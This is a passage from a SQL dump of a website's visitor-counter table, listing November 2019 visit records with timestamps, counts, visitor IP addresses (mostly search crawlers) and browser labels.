207.46.13.118','other'),(461885,1574065171,2,2,0,0,'8.29.198.27','other'),(461886,1574065208,1,1,0,0,'37.9.113.177','other'),(461887,1574065579,16,16,0,0,'167.114.181.145','chrome'),(461888,1574065594,6,6,0,0,'167.114.181.145','firefox'),(461889,1574065734,1,1,0,0,'167.114.181.145','other'),(461890,1574065790,1,1,0,0,'37.229.3.30','other'),(461891,1574065876,1,1,0,0,'91.196.177.46','chrome'),(461892,1574066573,1,1,0,0,'141.8.188.18','other'),(461893,1574066778,1,1,0,0,'95.108.213.3','other'),(461894,1574067500,1,1,0,0,'207.46.13.140','other'),(461895,1574067594,1,1,0,0,'91.196.178.73','chrome'),(461896,1574068017,1,1,0,0,'31.13.127.21','other'),(461897,1574068018,1,1,0,0,'31.13.127.20','other'),(461898,1574068788,1,1,0,0,'207.46.13.140','other'),(461899,1574069337,1,1,0,0,'66.249.64.28','chrome'),(461900,1574069849,1,1,0,0,'18.222.229.44','chrome'),(461901,1574070122,1,1,0,0,'91.196.178.84','chrome'),(461902,1574070382,1,1,0,0,'91.196.178.94','firefox'),(461903,1574071712,1,1,0,0,'66.249.64.26','chrome'),(461904,1574072760,1,1,0,0,'157.55.39.195','other'),(461905,1574072827,1,1,0,0,'141.8.132.37','other'),(461906,1574072870,1,1,0,0,'37.9.113.10','other'),(461907,1574073599,1,1,0,0,'91.196.178.84','chrome'),(461908,1574074985,1,1,0,0,'141.8.188.18','other'),(461909,1574075131,1,1,0,0,'91.196.178.94','firefox'),(461910,1574075292,1,1,0,0,'37.9.113.97','other'),(461911,1574075319,1,1,0,0,'95.108.181.104','other'),(461912,1574075698,1,1,0,0,'207.46.13.140','other'),(461913,1574075780,1,1,0,0,'109.74.154.72','chrome'),(461914,1574076031,2,2,0,0,'8.29.198.25','other'),(461915,1574077286,2,2,0,0,'207.46.13.140','other'),(461916,1574078109,2,2,0,0,'212.90.45.139','firefox'),(461917,1574078995,1,1,0,0,'207.46.13.118','other'),(461918,1574079294,1,1,0,0,'37.52.162.98','firefox'),(461919,1574079514,1,1,0,0,'37.9.113.33','other'),(461920,1574079539,1,1,0,0,'87.250.224.104','other'),(461921,1574079546,2,2,0,0,'91.196.178.73','chrome'),(461922,1574079640,1,1,0,0,'195.3.225.40','chrome'),(461923,1574079791,1,1,0,0,'207.46.13.148','other'),(461924,1574080070,1,1,0,0,'91.196.177.46','chrome'),(461925,1574080531,1,1,0,0,'91.196.178.73','chrome'),(461926,1574081269,1,1,0,0,'46.174.121.173','chrome');
INSERT INTO `fw3gt_zt_visitor_counter` VALUES (461927,1574081319,1,1,0,0,'91.196.178.84','chrome'),(461928,1574081824,1,1,0,0,'207.46.13.118','other'),(461929,1574082835,1,1,0,0,'178.158.234.168','other'),(461930,1574083344,1,1,0,0,'207.46.13.148','other'),(461931,1574083623,1,1,0,0,'89.71.171.168','chrome'),(461932,1574084362,1,1,0,0,'91.196.178.73','chrome'),(461933,1574085709,1,1,0,0,'91.196.178.73','chrome'),(461934,1574086005,1,1,0,0,'207.46.13.140','other'),(461935,1574086048,1,1,0,0,'141.8.132.2','other'),(461936,1574086089,1,1,0,0,'91.196.178.84','chrome'),(461937,1574086668,1,1,0,0,'91.196.177.46','firefox'),(461938,1574086891,2,2,0,0,'8.29.198.27','other'),(461939,1574087041,1,1,0,0,'5.255.253.8','other'),(461940,1574087097,1,1,0,0,'91.196.178.129','firefox'),(461941,1574091070,1,1,0,0,'207.46.13.140','other'),(461942,1574091648,1,1,0,0,'141.8.142.50','other'),(461943,1574092307,1,1,0,0,'91.196.178.189','chrome'),(461944,1574092519,1,1,0,0,'66.249.64.26','chrome'),(461945,1574092543,1,1,0,0,'207.46.13.118','other'),(461946,1574092823,1,1,0,0,'207.46.13.140','other'),(461947,1574092965,1,1,0,0,'91.196.179.138','chrome'),(461948,1574093042,1,1,0,0,'66.249.64.28','chrome'),(461949,1574094138,1,1,0,0,'66.249.64.28','chrome'),(461950,1574094411,1,1,0,0,'54.36.149.11','other'),(461951,1574094466,1,1,0,0,'66.249.64.27','chrome'),(461952,1574094547,1,1,0,0,'207.46.13.118','other'),(461953,1574095492,1,1,0,0,'141.8.183.15','other'),(461954,1574095497,1,1,0,0,'157.55.39.94','other'),(461955,1574096774,1,1,0,0,'46.211.139.120','chrome'),(461956,1574097227,1,1,0,0,'31.13.127.27','other'),(461957,1574097228,1,1,0,0,'31.13.127.26','other'),(461958,1574097423,1,1,0,0,'54.36.149.14','other'),(461959,1574097815,1,1,0,0,'8.29.198.27','other'),(461960,1574098445,1,1,0,0,'66.249.70.62','chrome'),(461961,1574098545,1,1,0,0,'8.29.198.26','other'),(461962,1574098745,1,1,0,0,'54.36.149.30','other'),(461963,1574100218,1,1,0,0,'91.196.178.86','firefox'),(461964,1574100551,1,1,0,0,'207.46.13.118','other'),(461965,1574100676,1,1,0,0,'31.13.127.8','other'),(461966,1574100677,1,1,0,0,'31.13.127.1','other'),(461967,1574101206,1,1,0,0,'54.36.149.45','other'),(461968,1574101230,2,2,0,0,'157.55.39.94','other'),(461969,1574101884,1,1,0,0,'207.46.13.96','other'),(461970,1574102028,1,1,0,0,'207.46.13.140','other'),(461971,1574102242,6,6,0,0,'18.205.176.85','other'),(461972,1574102650,1,1,0,0,'54.36.149.59','other'),(461973,1574102718,1,1,0,0,'46.211.132.4','chrome'),(461974,1574102766,1,1,0,0,'54.36.149.69','other'),(461975,1574102945,1,1,0,0,'93.74.225.133','chrome'),(461976,1574103553,1,1,0,0,'37.9.113.177','other'),(461977,1574103573,1,1,0,0,'37.9.113.202','other'),(461978,1574103945,1,1,0,0,'207.46.13.96','other'),(461979,1574104126,3,3,0,0,'18.205.176.85','other'),(461980,1574105546,3,3,0,0,'18.205.176.85','other'),(461981,1574106013,1,1,0,0,'91.106.199.104','other'),(461982,1574106395,1,1,0,0,'87.250.224.90','other'),(461983,1574106427,1,1,0,0,'207.46.13.118','other'),(461984,1574107059,1,1,0,0,'157.55.39.95','other'),(461985,1574107233,5,5,0,0,'18.205.176.85','other'),(461986,1574108059,1,1,0,0,'157.55.39.94','other'),(461987,1574108292,2,2,0,0,'95.213.141.126','opera'),(461988,1574108332,1,1,0,0,'141.8.142.177','other'),(461989,1574108458,1,1,0,0,'91.196.178.56','chrome'),(461990,1574108465,1,1,0,0,'66.249.64.26','chrome'),(461991,1574108681,1,1,0,0,'8.29.198.25','other'),(461992,1574109057,1,1,0,0,'37.9.113.10','other'),(461993,1574109060,1,1,0,0,'37.9.113.200','other'),(461994,1574109152,1,1,0,0,'37.9.113.202','other'),(461995,1574109169,1,1,0,0,'157.55.39.94','other'),(461996,1574109453,1,1,0,0,'8.29.198.27','other'),(461997,1574110243,1,1,0,0,'17.58.101.25','other'),(461998,1574110423,1,1,0,0,'87.250.224.90','other'),(461999,1574110971,1,1,0,0,'95.108.181.104','other'),(462000,1574110975,2,0,2,0,'66.249.70.36',''),(462001,1574111089,1,0,1,0,'66.249.64.27',''),(462002,1574111180,1,1,0,0,'54.36.149.92','other'),(462003,1574111403,1,1,0,0,'207.46.13.96','other'),(462004,1574111505,1,0,1,0,'66.249.70.62',''),(462005,1574111951,1,0,1,0,'66.249.70.36',''),(462006,1574112078,3,0,3,0,'66.249.64.28',''),(462007,1574112296,1,1,0,0,'157.55.39.95','other'),(462008,1574112481,1,1,0,0,'54.36.149.13','other'),(462009,1574112493,2,0,2,0,'66.249.64.27',''),(462010,1574112554,1,1,0,0,'207.46.13.118','other'),(462011,1574112559,2,0,2,0,'66.249.70.62',''),(462012,1574112598,1,0,1,0,'66.249.64.26',''),(462013,1574112653,1,0,1,0,'66.249.70.33',''),(462014,1574113478,1,0,1,0,'66.249.64.27',''),(462015,1574113826,1,1,0,0,'54.36.149.93','other'),(462016,1574114312,1,1,0,0,'54.36.149.54','other'),(462017,1574114386,1,1,0,0,'123.17.85.94','chrome'),(462018,1574114566,1,1,0,0,'188.163.116.75','chrome'),(462019,1574114706,1,1,0,0,'141.8.142.161','other'),(462020,1574114813,1,1,0,0,'38.99.62.94','other'),(462021,1574115437,1,1,0,0,'207.46.13.118','other'),(462022,1574115886,1,1,0,0,'141.8.132.2','other'),(462023,1574115921,1,1,0,0,'141.8.132.37','other'),(462024,1574116940,1,1,0,0,'54.36.149.84','other'),(462025,1574117202,1,1,0,0,'54.36.149.38','other'),(462026,1574117412,1,1,0,0,'54.36.149.44','other'),(462027,1574118162,1,1,0,0,'2.95.0.140','chrome'),(462028,1574119461,1,1,0,0,'207.46.13.96','other'),(462029,1574119516,1,1,0,0,'37.9.113.10','other'),(462030,1574119540,2,2,0,0,'8.29.198.25','other'),(462031,1574120010,1,1,0,0,'87.250.224.90','other'),(462032,1574120424,1,1,0,0,'54.36.149.12','other'),(462033,1574120732,2,2,0,0,'54.36.149.41','other'),(462034,1574123182,1,1,0,0,'141.8.142.161','chrome'),(462035,1574123202,1,1,0,0,'141.8.142.50','other'),(462036,1574123773,1,1,0,0,'54.36.149.43','other'),(462037,1574124608,1,1,0,0,'54.36.149.41','other'),(462038,1574125478,1,1,0,0,'54.36.149.38','other'),(462039,1574126502,1,1,0,0,'52.247.6.123','other'),(462040,1574126523,1,1,0,0,'207.46.13.118','other'),(462041,1574126831,1,1,0,0,'178.154.200.60','chrome'),(462042,1574126847,1,1,0,0,'213.180.203.44','other'),(462043,1574127430,1,1,0,0,'54.36.149.83','other'),(462044,1574127532,1,1,0,0,'52.247.6.123','other'),(462045,1574127799,1,1,0,0,'66.249.64.28','chrome'),(462046,1574128136,1,1,0,0,'95.108.181.104','other'),(462047,1574128142,1,1,0,0,'37.9.113.163','other'),(462048,1574128158,1,1,0,0,'141.8.142.164','other'),(462049,1574128572,1,1,0,0,'212.92.107.35','firefox'),(462050,1574129137,1,1,0,0,'193.203.50.34','firefox'),(462051,1574129140,1,1,0,0,'217.12.210.146','firefox'),(462052,1574129382,1,1,0,0,'141.8.132.19','other'),(462053,1574130159,1,1,0,0,'141.8.142.115','other'),(462054,1574130162,1,1,0,0,'178.154.200.13','other'),(462055,1574130393,1,1,0,0,'8.29.198.27','other'),(462056,1574130485,1,1,0,0,'141.8.132.2','chrome'),(462057,1574130518,1,1,0,0,'178.154.171.66','other'),(462058,1574131190,1,1,0,0,'8.29.198.25','other'),(462059,1574131798,1,1,0,0,'207.46.13.118','other'),(462060,1574132637,2,2,0,0,'60.191.38.77','firefox'),(462061,1574132705,1,1,0,0,'54.36.149.41','other'),(462062,1574133559,1,1,0,0,'52.247.6.123','other'),(462063,1574134193,1,1,0,0,'95.108.181.103','other'),(462064,1574135544,1,1,0,0,'207.46.13.96','other'),(462065,1574136332,1,1,0,0,'52.247.6.123','other'),(462066,1574136373,1,1,0,0,'66.249.70.33','chrome'),(462067,1574137952,1,1,0,0,'141.8.142.115','other'),(462068,1574138053,1,1,0,0,'207.46.13.96','other'),(462069,1574139099,1,1,0,0,'54.36.149.29','other'),(462070,1574139918,2,2,0,0,'66.249.64.27','chrome'),(462071,1574139970,2,2,0,0,'207.46.13.118','other'),(462072,1574141245,1,1,0,0,'54.36.149.95','other'),(462073,1574141253,2,2,0,0,'8.29.198.27','other'),(462074,1574141584,1,1,0,0,'178.154.200.60','other'),(462075,1574141842,1,1,0,0,'141.8.188.25','other'),(462076,1574142262,1,1,0,0,'207.46.13.118','other'),(462077,1574142924,1,1,0,0,'207.46.13.96','other'),(462078,1574143446,1,1,0,0,'213.180.203.37','other'),(462079,1574143679,1,1,0,0,'66.249.64.26','chrome'),(462080,1574144127,1,1,0,0,'141.8.188.12','other'),(462081,1574145336,1,0,1,0,'66.249.70.36',''),(462082,1574145442,1,1,0,0,'5.45.207.65','other'),(462083,1574145473,1,1,0,0,'141.8.142.115','other'),(462084,1574145781,1,1,0,0,'141.8.183.15','other'),(462085,1574146863,1,1,0,0,'5.45.207.65','other'),(462086,1574147206,1,1,0,0,'54.36.149.98','other'),(462087,1574148148,2,2,0,0,'207.46.13.118','other'),(462088,1574148942,1,1,0,0,'54.36.149.32','other'),(462089,1574149087,1,1,0,0,'31.13.103.3','other'),(462090,1574149089,2,2,0,0,'31.13.103.17','other'),(462091,1574149106,2,2,0,0,'52.247.6.123','other'),(462092,1574149131,3,3,0,0,'207.46.13.118','other'),(462093,1574149751,1,1,0,0,'207.46.13.96','other'),(462094,1574150363,1,1,0,0,'178.154.200.27','other'),(462095,1574150896,1,1,0,0,'18.222.210.185','chrome'),(462096,1574151302,3,3,0,0,'207.46.13.118','other'),(462097,1574151484,1,1,0,0,'91.196.178.68','firefox'),(462098,1574151773,2,2,0,0,'66.129.102.52','chrome'),(462099,1574152001,1,1,0,0,'54.36.149.44','other'),(462100,1574152033,1,1,0,0,'207.46.13.96','other'),(462101,1574152109,1,1,0,0,'8.29.198.27','other'),(462102,1574152185,1,0,1,0,'66.249.70.62',''),(462103,1574152449,1,1,0,0,'91.196.178.68','firefox'),(462104,1574152900,1,1,0,0,'8.29.198.26','other'),(462105,1574152965,1,0,1,0,'66.249.64.28',''),(462106,1574153102,1,1,0,0,'157.55.39.150','other'),(462107,1574153237,1,1,0,0,'31.13.127.7','other'),(462108,1574153238,1,1,0,0,'31.13.127.14','other'),(462109,1574153366,1,1,0,0,'91.196.178.84','chrome'),(462110,1574153384,1,1,0,0,'91.196.178.68','firefox'),(462111,1574153597,1,1,0,0,'54.36.149.12','other'),(462112,1574153980,2,0,2,0,'66.249.64.28',''),(462113,1574154015,1,0,1,0,'66.249.64.26',''),(462114,1574154087,1,0,1,0,'66.249.64.27',''),(462115,1574154489,1,1,0,0,'91.196.178.184','chrome'),(462116,1574154497,1,1,0,0,'91.196.178.68','firefox'),(462117,1574154891,1,1,0,0,'46.151.189.37','chrome'),(462118,1574155501,1,1,0,0,'3.230.145.248','chrome'),(462119,1574155571,1,0,1,0,'66.249.70.33',''),(462120,1574155696,2,1,1,0,'66.249.64.28',''),(462121,1574155928,1,0,1,0,'66.249.70.62',''),(462122,1574156100,1,1,0,0,'54.36.149.82','other'),(462123,1574156355,2,2,0,0,'13.66.139.0','other'),(462124,1574156702,1,1,0,0,'141.8.183.15','other'),(462125,1574156822,1,1,0,0,'52.247.6.123','other'),(462126,1574157300,1,1,0,0,'66.249.64.26','chrome'),(462127,1574157681,1,1,0,0,'91.196.178.68','firefox'),(462128,1574157722,1,1,0,0,'207.46.13.96','other'),(462129,1574158535,1,1,0,0,'54.36.149.5','other'),(462130,1574159310,1,1,0,0,'52.247.6.123','other'),(462131,1574159743,1,1,0,0,'54.36.149.70','other'),(462132,1574160955,1,1,0,0,'54.36.149.14','other'),(462133,1574161146,1,1,0,0,'178.154.200.33','other'),(462134,1574161897,1,1,0,0,'157.55.39.150','other'),(462135,1574162190,1,1,0,0,'109.74.154.72','chrome'),(462136,1574162223,1,1,0,0,'52.247.6.123','other'),(462137,1574162671,1,1,0,0,'178.154.200.60','other'),(462138,1574162962,1,1,0,0,'8.29.198.26','other'),(462139,1574163363,1,1,0,0,'52.247.6.123','other'),(462140,1574163431,1,1,0,0,'207.46.13.96','other'),(462141,1574163833,1,1,0,0,'8.29.198.27','other'),(462142,1574163953,2,2,0,0,'207.46.13.118','other'),(462143,1574164950,1,1,0,0,'130.180.220.221','chrome'),(462144,1574165217,3,3,0,0,'157.55.39.150','other'),(462145,1574165439,1,1,0,0,'176.98.76.51','chrome'),(462146,1574165575,1,1,0,0,'52.247.6.123','other'),(462147,1574166033,1,1,0,0,'54.36.149.103','other'),(462148,1574166643,1,1,0,0,'207.46.13.15','other'),(462149,1574167088,1,1,0,0,'157.55.39.205','other'),(462150,1574167252,1,1,0,0,'91.196.179.138','chrome'),(462151,1574167261,1,1,0,0,'54.36.149.102','other'),(462152,1574168037,1,1,0,0,'157.55.39.150','other'),(462153,1574168199,1,1,0,0,'91.196.178.68','firefox'),(462154,1574168477,1,1,0,0,'91.196.178.175','chrome'),(462155,1574168513,1,1,0,0,'91.196.178.73','chrome'),(462156,1574168693,1,1,0,0,'91.196.178.169','chrome'),(462157,1574168937,1,1,0,0,'207.46.13.15','other'),(462158,1574168939,1,1,0,0,'195.162.90.62','chrome'),(462159,1574169468,1,1,0,0,'37.9.113.97','other'),(462160,1574169485,1,1,0,0,'54.36.149.105','other'),(462161,1574169707,1,1,0,0,'54.36.149.103','other'),(462162,1574169849,1,1,0,0,'209.17.97.98','other'),(462163,1574170515,1,1,0,0,'157.55.39.150','other'),(462164,1574170841,1,1,0,0,'37.9.113.142','other'),(462165,1574171299,1,1,0,0,'91.196.178.61','chrome'),(462166,1574172105,2,2,0,0,'91.196.178.68','firefox'),(462167,1574172121,1,1,0,0,'91.196.178.84','chrome'),(462168,1574172382,1,1,0,0,'207.46.13.15','other'),(462169,1574172966,2,2,0,0,'198.16.66.124','chrome'),(462170,1574173326,1,1,0,0,'207.46.13.15','other'),(462171,1574173838,2,2,0,0,'8.29.198.26','other'),(462172,1574173962,1,1,0,0,'91.196.178.84','chrome'),(462173,1574174741,2,2,0,0,'207.46.13.15','other'),(462174,1574174910,1,1,0,0,'157.55.39.93','other'),(462175,1574174936,1,1,0,0,'141.8.183.33','other'),(462176,1574175047,1,1,0,0,'37.9.113.97','other'),(462177,1574175074,2,2,0,0,'77.111.246.224','chrome'),(462178,1574175186,1,1,0,0,'66.249.64.26','chrome'),(462179,1574175220,1,1,0,0,'209.17.96.250','other'),(462180,1574175236,1,1,0,0,'91.196.178.84','chrome'),(462181,1574176362,1,1,0,0,'207.46.13.15','other'),(462182,1574176616,1,1,0,0,'66.249.64.28','chrome'),(462183,1574176848,1,1,0,0,'52.247.6.123','other'),(462184,1574177738,1,1,0,0,'93.125.99.116','firefox'),(462185,1574178535,1,1,0,0,'157.55.39.93','other'),(462186,1574178740,1,1,0,0,'157.55.39.150','other'),(462187,1574178915,1,1,0,0,'91.196.178.131','chrome'),(462188,1574179375,1,1,0,0,'37.9.113.33','other'),(462189,1574179385,1,1,0,0,'207.46.13.15','other'),(462190,1574180247,1,1,0,0,'85.195.230.179','firefox'),(462191,1574180528,1,1,0,0,'141.8.132.2','other'),(462192,1574180689,1,1,0,0,'193.106.30.99','chrome'),(462193,1574180899,1,1,0,0,'52.247.6.123','other'),(462194,1574181278,1,1,0,0,'168.81.234.148','chrome'),(462195,1574181826,1,1,0,0,'66.249.64.27','chrome'),(462196,1574182015,2,1,1,0,'207.46.13.15',''),(462197,1574182916,4,4,0,0,'162.254.206.234','firefox'),(462198,1574183393,1,1,0,0,'94.153.108.102','chrome'),(462199,1574183622,1,1,0,0,'157.55.39.93','other'),(462200,1574184692,1,1,0,0,'8.29.198.27','other'),(462201,1574185170,1,1,0,0,'91.196.178.61','chrome'),(462202,1574185554,2,2,0,0,'91.196.178.94','chrome'),(462203,1574185596,1,1,0,0,'8.29.198.25','other'),(462204,1574185653,1,0,1,0,'157.55.39.93',''),(462205,1574185828,1,1,0,0,'207.46.13.15','other'),(462206,1574186165,1,1,0,0,'157.55.39.93','other'),(462207,1574186293,1,1,0,0,'66.249.64.26','chrome'),(462208,1574187496,1,1,0,0,'66.249.64.28','chrome'),(462209,1574188318,1,1,0,0,'157.55.39.150','other'),(462210,1574188485,1,1,0,0,'178.154.200.27','other'),(462211,1574188665,1,1,0,0,'52.247.6.123','other'),(462212,1574189425,1,1,0,0,'66.249.64.28','chrome'),(462213,1574189803,1,1,0,0,'141.8.188.18','other'),(462214,1574190422,4,4,0,0,'207.46.13.15','other'),(462215,1574190679,1,1,0,0,'13.66.139.0','other'),(462216,1574191023,1,1,0,0,'157.55.39.150','other'),(462217,1574191226,1,1,0,0,'37.9.113.39','other'),(462218,1574191234,1,1,0,0,'178.154.200.33','other'),(462219,1574191256,1,1,0,0,'5.45.207.49','other'),(462220,1574191875,1,1,0,0,'141.8.142.50','other'),(462221,1574191878,1,1,0,0,'37.9.113.10','other'),(462222,1574192551,1,1,0,0,'5.45.207.49','other'),(462223,1574193461,1,1,0,0,'207.46.13.15','other'),(462224,1574194201,2,1,1,0,'66.249.64.26',''),(462225,1574194223,1,1,0,0,'52.247.7.166','other'),(462226,1574195546,1,1,0,0,'8.29.198.27','other'),(462227,1574195609,1,1,0,0,'91.196.178.94','chrome'),(462228,1574195832,4,4,0,0,'193.70.42.228','firefox'),(462229,1574196473,1,1,0,0,'8.29.198.27','other'),(462230,1574196557,1,1,0,0,'66.249.64.26','chrome'),(462231,1574196583,1,1,0,0,'91.196.178.133','firefox'),(462232,1574196707,1,1,0,0,'52.247.7.166','other'),(462233,1574196815,1,0,1,0,'207.46.13.15',''),(462234,1574198230,1,1,0,0,'52.247.7.166','other'),(462235,1574199322,1,1,0,0,'95.108.181.104','other'),(462236,1574199418,1,1,0,0,'91.207.60.35','firefox'),(462237,1574199420,1,1,0,0,'176.103.53.34','firefox'),(462238,1574202079,1,1,0,0,'178.154.200.27','other'),(462239,1574203127,1,1,0,0,'178.175.132.66','chrome'),(462240,1574203803,1,1,0,0,'207.46.13.15','other'),(462241,1574203920,1,1,0,0,'91.196.178.72','chrome'),(462242,1574204176,1,1,0,0,'52.247.6.123','other'),(462243,1574204796,1,0,1,0,'207.46.13.15',''),(462244,1574207610,1,1,0,0,'66.249.64.26','chrome'),(462245,1574207818,1,1,0,0,'8.29.198.27','other'),(462246,1574209232,1,1,0,0,'66.249.64.28','chrome'),(462247,1574210049,1,1,0,0,'66.249.70.33','chrome'),(462248,1574210339,1,1,0,0,'52.247.7.166','other'),(462249,1574210661,1,1,0,0,'66.249.64.27','chrome'),(462250,1574210873,1,1,0,0,'66.249.64.28','chrome'),(462251,1574211484,1,1,0,0,'51.68.152.26','chrome'),(462252,1574211785,1,1,0,0,'52.247.7.166','other'),(462253,1574211836,1,1,0,0,'95.108.213.39','other'),(462254,1574213569,1,1,0,0,'66.249.64.26','chrome'),(462255,1574214437,1,1,0,0,'34.211.104.137','other'),(462256,1574214447,1,1,0,0,'66.249.64.27','chrome'),(462257,1574215385,1,0,1,0,'207.46.13.15',''),(462258,1574215853,1,1,0,0,'66.249.64.26','chrome'),(462259,1574216725,2,2,0,0,'5.9.61.232','other'),(462260,1574217042,1,1,0,0,'95.108.213.39','other'),(462261,1574217192,1,1,0,0,'66.249.64.28','chrome'),(462262,1574217237,1,1,0,0,'13.66.139.0','other'),(462263,1574217286,1,1,0,0,'66.249.64.27','chrome'),(462264,1574217799,1,1,0,0,'8.29.198.25','other'),(462265,1574218071,1,1,0,0,'52.247.7.166','other'),(462266,1574218550,1,1,0,0,'66.249.64.26','chrome'),(462267,1574218703,1,1,0,0,'8.29.198.26','other'),(462268,1574219894,1,1,0,0,'66.249.64.26','chrome'),(462269,1574220452,1,1,0,0,'207.46.13.15','other'),(462270,1574221250,1,1,0,0,'141.8.188.39','other'),(462271,1574221278,1,1,0,0,'178.154.171.66','other'),(462272,1574221279,1,1,0,0,'37.9.113.10','other'),(462273,1574223843,1,1,0,0,'5.45.207.44','other'),(462274,1574223935,1,1,0,0,'5.255.253.8','other'),(462275,1574224513,1,1,0,0,'91.196.178.135','firefox'),(462276,1574225694,1,1,0,0,'66.249.64.27','chrome'),(462277,1574225823,1,1,0,0,'52.247.2.44','other'),(462278,1574226665,2,2,0,0,'66.249.64.26','chrome'),(462279,1574227388,1,1,0,0,'52.247.7.166','other'),(462280,1574227763,1,1,0,0,'95.108.181.104','other'),(462281,1574227895,2,2,0,0,'66.249.64.26','chrome'),(462282,1574227904,1,1,0,0,'52.247.2.44','other'),(462283,1574228219,1,1,0,0,'52.247.6.123','other'),(462284,1574228647,1,1,0,0,'8.29.198.25','other'),(462285,1574228946,1,1,0,0,'66.249.64.27','chrome'),(462286,1574229078,1,1,0,0,'66.249.64.26','chrome'),(462287,1574229574,1,1,0,0,'8.29.198.26','other'),(462288,1574229714,1,1,0,0,'52.247.6.48','other'),(462289,1574229865,1,1,0,0,'66.249.64.27','chrome'),(462290,1574230158,1,1,0,0,'66.249.64.26','chrome'),(462291,1574230418,1,1,0,0,'37.9.113.6','other'),(462292,1574230448,1,1,0,0,'141.8.183.15','other'),(462293,1574230587,1,1,0,0,'95.108.213.61','other'),(462294,1574230820,2,2,0,0,'66.249.64.28','chrome'),(462295,1574230829,3,3,0,0,'66.249.64.27','chrome'),(462296,1574231267,2,2,0,0,'66.249.64.26','chrome'),(462297,1574231864,1,1,0,0,'66.249.70.62','chrome'),(462298,1574232081,1,1,0,0,'66.249.64.28','chrome'),(462299,1574232107,2,2,0,0,'66.249.64.27','chrome'),(462300,1574232598,1,1,0,0,'66.249.70.36','chrome'),(462301,1574232642,1,1,0,0,'91.196.178.84','chrome'),(462302,1574232947,1,1,0,0,'95.108.213.3','other'),(462303,1574232991,1,1,0,0,'5.45.207.43','other'),(462304,1574233456,3,3,0,0,'66.249.64.28','chrome'),(462305,1574233475,1,1,0,0,'66.249.64.26','chrome'),(462306,1574233877,1,1,0,0,'5.53.124.153','other'),(462307,1574234043,1,1,0,0,'66.249.70.62','chrome'),(462308,1574234145,1,1,0,0,'195.114.146.243','chrome'),(462309,1574234288,1,1,0,0,'141.8.188.18','other'),(462310,1574234291,1,1,0,0,'178.154.171.66','other'),(462311,1574234387,1,1,0,0,'66.249.64.27','chrome'),(462312,1574234408,1,1,0,0,'66.249.64.28','chrome'),(462313,1574234483,1,1,0,0,'66.249.70.36','chrome'),(462314,1574234487,1,1,0,0,'91.196.178.189','chrome'),(462315,1574235130,1,1,0,0,'66.249.70.62','chrome'),(462316,1574235535,1,1,0,0,'141.8.142.115','other'),(462317,1574235829,2,2,0,0,'66.249.64.27','chrome'),(462318,1574235906,3,3,0,0,'66.249.64.26','chrome'),(462319,1574236240,1,1,0,0,'66.249.70.33','chrome'),(462320,1574236943,1,1,0,0,'77.111.245.153','chrome'),(462321,1574237014,1,1,0,0,'66.249.64.26','chrome'),(462322,1574237053,2,2,0,0,'66.249.64.27','chrome'),(462323,1574237207,2,2,0,0,'66.249.64.28','chrome'),(462324,1574237402,1,1,0,0,'157.55.39.245','other'),(462325,1574237976,1,1,0,0,'66.249.64.27','chrome'),(462326,1574238370,1,1,0,0,'157.55.39.245','other'),(462327,1574239458,1,1,0,0,'66.249.64.26','chrome'),(462328,1574239472,1,1,0,0,'141.8.188.38','other'),(462329,1574239512,1,1,0,0,'8.29.198.27','other'),(462330,1574239539,1,1,0,0,'95.128.161.94','chrome'),(462331,1574239623,1,1,0,0,'91.196.178.84','chrome'),(462332,1574239692,1,1,0,0,'95.135.239.39','chrome'),(462333,1574239911,3,3,0,0,'66.249.64.27','chrome'),(462334,1574240129,1,1,0,0,'91.196.178.175','chrome'),(462335,1574240226,1,1,0,0,'66.249.64.28','chrome'),(462336,1574240453,1,1,0,0,'8.29.198.25','other'),(462337,1574240504,1,1,0,0,'176.98.70.59','chrome'),(462338,1574240966,2,2,0,0,'66.249.64.26','chrome'),(462339,1574241136,1,1,0,0,'157.55.39.245','other'),(462340,1574241260,1,1,0,0,'91.196.178.70','chrome'),(462341,1574241654,2,2,0,0,'66.249.64.27','chrome'),(462342,1574241716,2,2,0,0,'95.216.16.51','other'),(462343,1574242510,1,1,0,0,'95.108.181.103','other'),(462344,1574242627,1,1,0,0,'91.196.178.84','chrome'),(462345,1574242805,1,1,0,0,'66.249.64.27','chrome'),(462346,1574242857,1,1,0,0,'66.249.64.26','chrome'),(462347,1574243495,1,1,0,0,'66.249.70.36','chrome'),(462348,1574243811,1,1,0,0,'66.249.64.27','chrome'),(462349,1574244399,3,3,0,0,'66.249.64.26','chrome'),(462350,1574244610,1,1,0,0,'66.249.64.28','chrome'),(462351,1574244976,1,1,0,0,'157.55.39.177','other'),(462352,1574245183,1,1,0,0,'18.220.62.128','chrome'),(462353,1574245210,1,1,0,0,'141.8.142.164','other'),(462354,1574245218,1,1,0,0,'66.249.64.27','chrome'),(462355,1574245266,1,1,0,0,'5.45.207.49','other'),(462356,1574246615,1,1,0,0,'46.164.130.94','chrome'),(462357,1574246642,2,2,0,0,'66.249.64.26','chrome'),(462358,1574246657,2,2,0,0,'66.249.64.27','chrome'),(462359,1574246841,2,2,0,0,'95.213.141.126','opera'),(462360,1574247139,1,1,0,0,'141.8.142.177','other'),(462361,1574247808,1,1,0,0,'109.74.154.72','chrome'),(462362,1574247839,2,2,0,0,'66.249.64.26','chrome'),(462363,1574248543,3,3,0,0,'66.249.64.27','chrome'),(462364,1574248904,1,1,0,0,'141.8.142.132','other'),(462365,1574248918,1,1,0,0,'66.249.64.26','chrome'),(462366,1574249092,1,1,0,0,'77.222.155.155','chrome'),(462367,1574249662,1,1,0,0,'66.249.64.28','chrome'),(462368,1574250002,1,1,0,0,'66.249.70.33','chrome'),(462369,1574250080,1,1,0,0,'66.249.70.62','chrome'),(462370,1574250188,1,1,0,0,'95.108.213.55','other'),(462371,1574250381,1,1,0,0,'8.29.198.25','other'),(462372,1574250736,2,2,0,0,'66.249.64.26','chrome'),(462373,1574251346,1,1,0,0,'8.29.198.25','other'),(462374,1574251907,2,2,0,0,'207.46.13.24','other'),(462375,1574252315,2,2,0,0,'66.249.64.26','chrome'),(462376,1574252323,2,2,0,0,'66.249.64.27','chrome'),(462377,1574252429,1,1,0,0,'66.249.70.36','chrome'),(462378,1574252531,1,1,0,0,'66.249.64.28','chrome'),(462379,1574252759,1,1,0,0,'141.8.188.38','other'),(462380,1574252763,1,1,0,0,'5.45.207.43','other'),(462381,1574252886,1,1,0,0,'207.46.13.24','other'),(462382,1574253992,1,1,0,0,'5.45.207.44','other'),(462383,1574254366,1,1,0,0,'157.55.39.245','other'),(462384,1574254513,2,2,0,0,'66.249.64.26','chrome'),(462385,1574254698,2,2,0,0,'66.249.64.28','chrome'),(462386,1574254723,1,1,0,0,'66.249.64.27','chrome'),(462387,1574254789,1,1,0,0,'91.196.178.93','chrome'),(462388,1574255160,1,1,0,0,